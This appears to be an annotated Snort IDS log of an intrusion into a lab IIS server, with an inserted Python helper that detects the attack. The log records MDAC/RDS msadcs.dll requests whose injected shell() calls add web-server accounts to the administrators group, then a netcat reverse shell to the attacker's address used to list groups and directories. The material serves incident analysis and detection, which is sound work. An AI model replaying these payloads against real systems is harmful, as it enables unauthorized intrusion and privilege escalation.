TCP TTL:111 TOS:0x0 ID:12871 IpLen:20 DgmLen:795 DF
***AP*** Seq: 0xA81CDD63 Ack: 0x2CC89868 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 601..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 392..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .l.o.c.a.l.g.r.o.u.p. .D.o.m.a.i.n. .A.d.m.i.n.s. .I.W.A.M
._.K.E.N.N.Y. ./.A.D.D.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s
.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c
.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t
.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to try to add user 'IUSR_KENNY' to the localgroup 'Domain Admins' (which doesn't exist)
!@# One of these should be the web server account (and thus the account that the remote shell is running as)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:54:03.153709 213.116.251.162:1943 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12889 IpLen:20 DgmLen:795 DF
***AP*** Seq: 0xA8750ED0 Ack: 0x2CC8F04E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 601..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 392..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .l.o.c.a.l.g.r.o.u.p. .D.o.m.a.i.n. .A.d.m.i.n.s. .I.U.S.R
._.K.E.N.N.Y. ./.A.D.D.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s
.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c
.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t
.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tests the privileges of the remote shell by running 'net session'.
[**] netcat session 6969 [**]
02/04-05:54:10.507763 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45691 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBF09C9 Ack: 0x9E43FE36 Win: 0x1F1B TcpLen: 20
net session..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Still denied
[**] netcat session 6969 [**]
02/04-05:54:11.036185 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45947 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBF09D6 Ack: 0x9E43FE36 Win: 0x1F1B TcpLen: 20
System error 5 has occurred......Access is denied........C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:54:38.643320 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:52603 IpLen:20 DgmLen:198 DF
***AP*** Seq: 0x2CBF0A19 Ack: 0x9E43FE5D Win: 0x1EF4 TcpLen: 20
.[A.[A.[Anet localgroup domain admins..The name specified is not
recognized as an..internal or external command, operable progra
m or batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:54:43.650438 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54907 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBF0AB7 Ack: 0x9E43FE76 Win: 0x1EDB TcpLen: 20
net group domain admins..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:54:44.182811 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:55163 IpLen:20 DgmLen:272 DF
***AP*** Seq: 0x2CBF0AD0 Ack: 0x9E43FE76 Win: 0x1EDB TcpLen: 20
The syntax of this command is:.......NET GROUP [groupname [/COMM
ENT:"text"]] [/DOMAIN].. groupname {/ADD [/COMMENT:"tex
t"] | /DELETE} [/DOMAIN].. groupname username [...] {/
ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Lists the members of the local administrators group
[**] netcat session 6969 [**]
02/04-05:55:45.142949 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:60539 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x2CBF0BB8 Ack: 0x9E43FE95 Win: 0x1EBC TcpLen: 20
net localgroup administrators..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:55:45.658231 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:60795 IpLen:20 DgmLen:335 DF
***AP*** Seq: 0x2CBF0BD7 Ack: 0x9E43FE95 Win: 0x1EBC TcpLen: 20
Alias name administrators..Comment Members can fully
administer the computer/domain....Members.....------------------
-------------------------------------------------------------..A
dministrator Domain Admins ..The command c
ompleted successfully........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Realizes his mistake and uses MDAC vulnerability to add the same two accounts to the localgroup 'administrators'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:56:05.379837 213.116.251.162:1946 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12965 IpLen:20 DgmLen:797 DF
***AP*** Seq: 0xAA4849C6 Ack: 0x2CCACD70 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 603..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 394..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .l.o.c.a.l.g.r.o.u.p. .a.d.m.i.n.i.s.t.r.a.t.o.r.s. .I.U.S
.R._.K.E.N.N.Y. ./.A.D.D.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o
.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=
.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b
.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:56:17.287747 213.116.251.162:1948 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12977 IpLen:20 DgmLen:797 DF
***AP*** Seq: 0xAA76D671 Ack: 0x2CCAFBF3 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 603..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 394..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .l.o.c.a.l.g.r.o.u.p. .a.d.m.i.n.i.s.t.r.a.t.o.r.s. .I.W.A
.M._.K.E.N.N.Y. ./.A.D.D.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o
.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=
.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b
.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
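An added detection helper, not part of the original capture or the analyst's notes: it parses one Snort alert record in the format shown above, re-joins the 64-column dump, recovers the UTF-16LE RDS query from the dotted printable form, and reports the shell() command and any local-group membership change it carries. The two sample records are re-typed from the capture above; the function and class names are my own.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed sample: one of the msadcs.dll POST records from the capture
# above, re-typed by hand. Snort prints every non-printable payload byte
# as '.', so the UTF-16LE query text ("S\x00e\x00l\x00...") shows up as
# "S.e.l.e.c.t" and the 64-column wrap is only display wrapping.
SAMPLE_RDS_ALERT = r"""[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:56:05.379837 213.116.251.162:1946 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12965 IpLen:20 DgmLen:797 DF
***AP*** Seq: 0xAA4849C6 Ack: 0x2CCACD70 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 603..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 394..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .l.o.c.a.l.g.r.o.u.p. .a.d.m.i.n.i.s.t.r.a.t.o.r.s. .I.U.S
.R._.K.E.N.N.Y. ./.A.D.D.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o
.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=
.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b
.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
"""

# Constructed sample: a reverse-shell record from the same capture. It is
# not an RDS request and must be ignored by the analyzer.
SAMPLE_NETCAT_ALERT = """[**] netcat session 6969 [**]
02/04-05:56:34.132619 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:3452 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x2CBF0D97 Ack: 0x9E43FED6 Win: 0x1E7B TcpLen: 20
net localgroup administrators..
"""

SIG_RE = re.compile(r"^\[\*\*\] (?P<sig>.+?) \[\*\*\]$")
ADDR_RE = re.compile(r"^\d\d/\d\d-[\d:.]+ (?P<src>\S+) -> (?P<dst>\S+)$")
# The query is the first UTF-16LE string in the x-varg body. In the dump a
# UTF-16LE string is a run of (printable, '.') pairs; the run ends where two
# '.' meet, i.e. at the binary bytes that follow the string terminator.
QUERY_RE = re.compile(r"S\.e\.l\.e\.c\.t\.(?:[^.]\.)+", re.I)
# Jet SQL lets an expression call the VBA shell() function, and "|...|"
# delimits the expression in the RDS query. That is what turns a data
# query into an OS command running as the web server account.
SHELL_RE = re.compile(r'\|\s*shell\(\s*"(?P<cmd>[^"]*)"\s*\)\s*\|', re.I)
LOCALGROUP_ADD_RE = re.compile(
    r"net\s+localgroup\s+(?P<group>\S+)\s+(?P<account>\S+)\s+/ADD\b", re.I)


@dataclass
class RdsFinding:
    src: str
    dst: str
    signature: str
    query: str                      # decoded text sent to AdvancedDataFactory.Query
    shell_command: Optional[str]    # contents of shell("..."), if any
    added_member: Optional[Tuple[str, str]]  # (group, account) for 'net localgroup ... /ADD'


def undot_utf16(display: str) -> str:
    """Recover a UTF-16LE string from Snort's printable dump: every NUL high
    byte was printed as '.', so the real characters sit at even indices."""
    return display[::2]


def analyze_alert(record: str) -> Optional[RdsFinding]:
    """Parse one Snort alert record; return a finding for RDS/MDAC requests
    whose query carries a shell() call, None for anything else."""
    lines = record.strip("\n").split("\n")
    if len(lines) < 5:
        return None
    sig = SIG_RE.match(lines[0])
    addr = ADDR_RE.match(lines[1])
    if not sig or not addr:
        return None
    payload = "".join(lines[4:])          # undo the 64-column display wrap
    if "/msadc/msadcs.dll" not in payload:
        return None
    q = QUERY_RE.search(payload)
    if not q:
        return None
    query = undot_utf16(q.group(0))
    shell = SHELL_RE.search(query)
    cmd = shell.group("cmd") if shell else None
    member = None
    if cmd:
        add = LOCALGROUP_ADD_RE.search(cmd)
        if add:
            member = (add.group("group"), add.group("account"))
    return RdsFinding(addr.group("src"), addr.group("dst"), sig.group("sig"),
                      query, cmd, member)


if __name__ == "__main__":
    for rec in (SAMPLE_RDS_ALERT, SAMPLE_NETCAT_ALERT):
        f = analyze_alert(rec)
        if f is None:
            print("not an RDS query request")
            continue
        print(f"{f.src} -> {f.dst}: {f.signature}")
        print("  query:", f.query)
        if f.shell_command:
            print("  OS command via shell():", f.shell_command)
        if f.added_member:
            print("  local group membership change:", f.added_member)
```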
[**] netcat session 6969 [**]
02/04-05:56:27.823385 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:2684 IpLen:20 DgmLen:193 DF
***AP*** Seq: 0x2CBF0CFE Ack: 0x9E43FEB7 Win: 0x1E9A TcpLen: 20
.[Anet localgroup administrators..The name specified is not reco
gnized as an..internal or external command, operable program or
batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:34.132619 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:3452 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x2CBF0D97 Ack: 0x9E43FED6 Win: 0x1E7B TcpLen: 20
net localgroup administrators..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to list out local administrators group and sees that the accounts are now included.
[**] netcat session 6969 [**]
02/04-05:56:34.639506 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:3708 IpLen:20 DgmLen:387 DF
***AP*** Seq: 0x2CBF0DB6 Ack: 0x9E43FED6 Win: 0x1E7B TcpLen: 20
Alias name administrators..Comment Members can fully
administer the computer/domain....Members.....------------------
-------------------------------------------------------------..A
dministrator Domain Admins IUSR_KENNY
..IWAM_KENNY ..The command completed suc
cessfully........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:38.640140 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4988 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBF0F11 Ack: 0x9E43FEE3 Win: 0x1E6E TcpLen: 20
net session..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tests his/her work by running the 'net session' command from the remote shell.
!@# Access is still denied.
[**] netcat session 6969 [**]
02/04-05:56:39.140703 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:5244 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBF0F1E Ack: 0x9E43FEE3 Win: 0x1E6E TcpLen: 20
System error 5 has occurred......Access is denied........C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:42.745289 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:5756 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF0F61 Ack: 0x9E43FEE8 Win: 0x1E69 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:43.341083 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:6012 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x2CBF1029 Ack: 0x9E43FEE8 Win: 0x1E69 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..02/04/01 06:49a
69 README.NOW.Hax0r..12/21/00 08:59p TEMP..02/04/01 06:55a WINNT..1
2/26/00 07:09p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,
643,591 bytes.. 1,690,852,864 bytes fre
e....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:53.360529 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8060 IpLen:20 DgmLen:96 DF
***AP*** Seq: 0x2CBF12F8 Ack: 0x9E43FEFC Win: 0x1E55 TcpLen: 20
cd program files....C:\Program Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:53.761423 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8316 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF1330 Ack: 0x9E43FEFF Win: 0x1E52 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files....12/21/00 08:59p
...12/21/00 08:59p
....12/0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:54.263026 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8572 IpLen:20 DgmLen:645 DF
***AP*** Seq: 0x2CBF13F8 Ack: 0x9E43FEFF Win: 0x1E52 TcpLen: 20
7/00 03:11p Common Files..12/21/00 08:59
p D4..12/07/00 03:23p
ICW-Internet Connection Wizard..12/07/00 03:37p
Microsoft FrontPage..12/07/00 03:34p
Mts..12/07/00 03:23p Outlook Expres
s..11/26/00 06:42p Plus!..12/16/00 06:54
p Syslogd..11/26/00 06:56p
Windows NT.. 11 File(s) 0 byte
s.. 1,690,852,864 bytes free....C:\Prog
ram Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:56.965862 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9852 IpLen:20 DgmLen:121 DF
***AP*** Seq: 0x2CBF1655 Ack: 0x9E43FF10 Win: 0x1E41 TcpLen: 20
cd common files....C:\Program Files\Common Files>..C:\Program Fi
les\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:57.867431 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:10364 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF16A6 Ack: 0x9E43FF15 Win: 0x1E3C TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files....12/0
7/00 03:11p ...12/07/00 03:11p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:58.363221 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:10620 IpLen:20 DgmLen:410 DF
***AP*** Seq: 0x2CBF176E Ack: 0x9E43FF15 Win: 0x1E3C TcpLen: 20
....12/07/00 03:23p Microsoft Shared
..12/07/00 03:35p ODBC..12/07/00 03:23p
Services..12/07/00 03:23p
System.. 6 File(s) 0 bytes..
1,690,852,864 bytes free....C:\Program F
iles\Common Files>..C:\Program Files\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:03.775916 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:12412 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x2CBF18E0 Ack: 0x9E43FF1E Win: 0x1E33 TcpLen: 20
cd obdc..The system cannot find the path specified.....C:\Progra
m Files\Common Files>..C:\Program Files\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:04.677543 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:12924 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF1955 Ack: 0x9E43FF23 Win: 0x1E2E TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files....12/0
7/00 03:11p ...12/07/00 03:11p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:05.160357 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:13180 IpLen:20 DgmLen:410 DF
***AP*** Seq: 0x2CBF1A1D Ack: 0x9E43FF23 Win: 0x1E2E TcpLen: 20
....12/07/00 03:23p Microsoft Shared
..12/07/00 03:35p ODBC..12/07/00 03:23p
Services..12/07/00 03:23p
System.. 6 File(s) 0 bytes..
1,690,852,864 bytes free....C:\Program F
iles\Common Files>..C:\Program Files\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:11.787813 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:16508 IpLen:20 DgmLen:197 DF
***AP*** Seq: 0x2CBF1B8F Ack: 0x9E43FF3C Win: 0x1E15 TcpLen: 20
cd microsoft shadr..red..The filename, directory name, or volume
label syntax is incorrect.....C:\Program Files\Common Files>..C
:\Program Files\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:18.397385 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:19836 IpLen:20 DgmLen:159 DF
***AP*** Seq: 0x2CBF1C2C Ack: 0x9E43FF51 Win: 0x1E00 TcpLen: 20
cd microsoft shared....C:\Program Files\Common Files\Microsoft S
hared>..C:\Program Files\Common Files\Microsoft Shared>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:19.999886 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:20348 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF1CA3 Ack: 0x9E43FF56 Win: 0x1DFB TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\Microso
ft Shared....12/07/00 03:23p ...12/07/00
03:23p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:20.492623 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:20604 IpLen:20 DgmLen:363 DF
***AP*** Seq: 0x2CBF1D6B Ack: 0x9E43FF56 Win: 0x1DFB TcpLen: 20
....12/07/00 03:23p
Stationery..12/07/00 03:09p TextConv..
4 File(s) 0 bytes..
1,690,852,864 bytes free....C:\Program Files\Common Files
\Microsoft Shared>..C:\Program Files\Common Files\Microsoft Shar
ed>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:22.603433 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:21628 IpLen:20 DgmLen:111 DF
***AP*** Seq: 0x2CBF1EAE Ack: 0x9E43FF5D Win: 0x1DF4 TcpLen: 20
cd ......C:\Program Files\Common Files>..C:\Program Files\Common
Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:25.107136 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:22908 IpLen:20 DgmLen:123 DF
***AP*** Seq: 0x2CBF1EF5 Ack: 0x9E43FF66 Win: 0x1DEB TcpLen: 20
cd odbc....C:\Program Files\Common Files\ODBC>..C:\Program Files
\Common Files\ODBC>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:25.908570 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23420 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF1F48 Ack: 0x9E43FF6B Win: 0x1DE6 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\ODBC...
.12/07/00 03:35p ...12/07/00 03:35p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:26.391538 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23676 IpLen:20 DgmLen:280 DF
***AP*** Seq: 0x2CBF2010 Ack: 0x9E43FF6B Win: 0x1DE6 TcpLen: 20
....12/07/00 03:35p Data Source
s.. 3 File(s) 0 bytes..
1,690,852,864 bytes free....C:\Program Files\Common
Files\ODBC>..C:\Program Files\Common Files\ODBC>
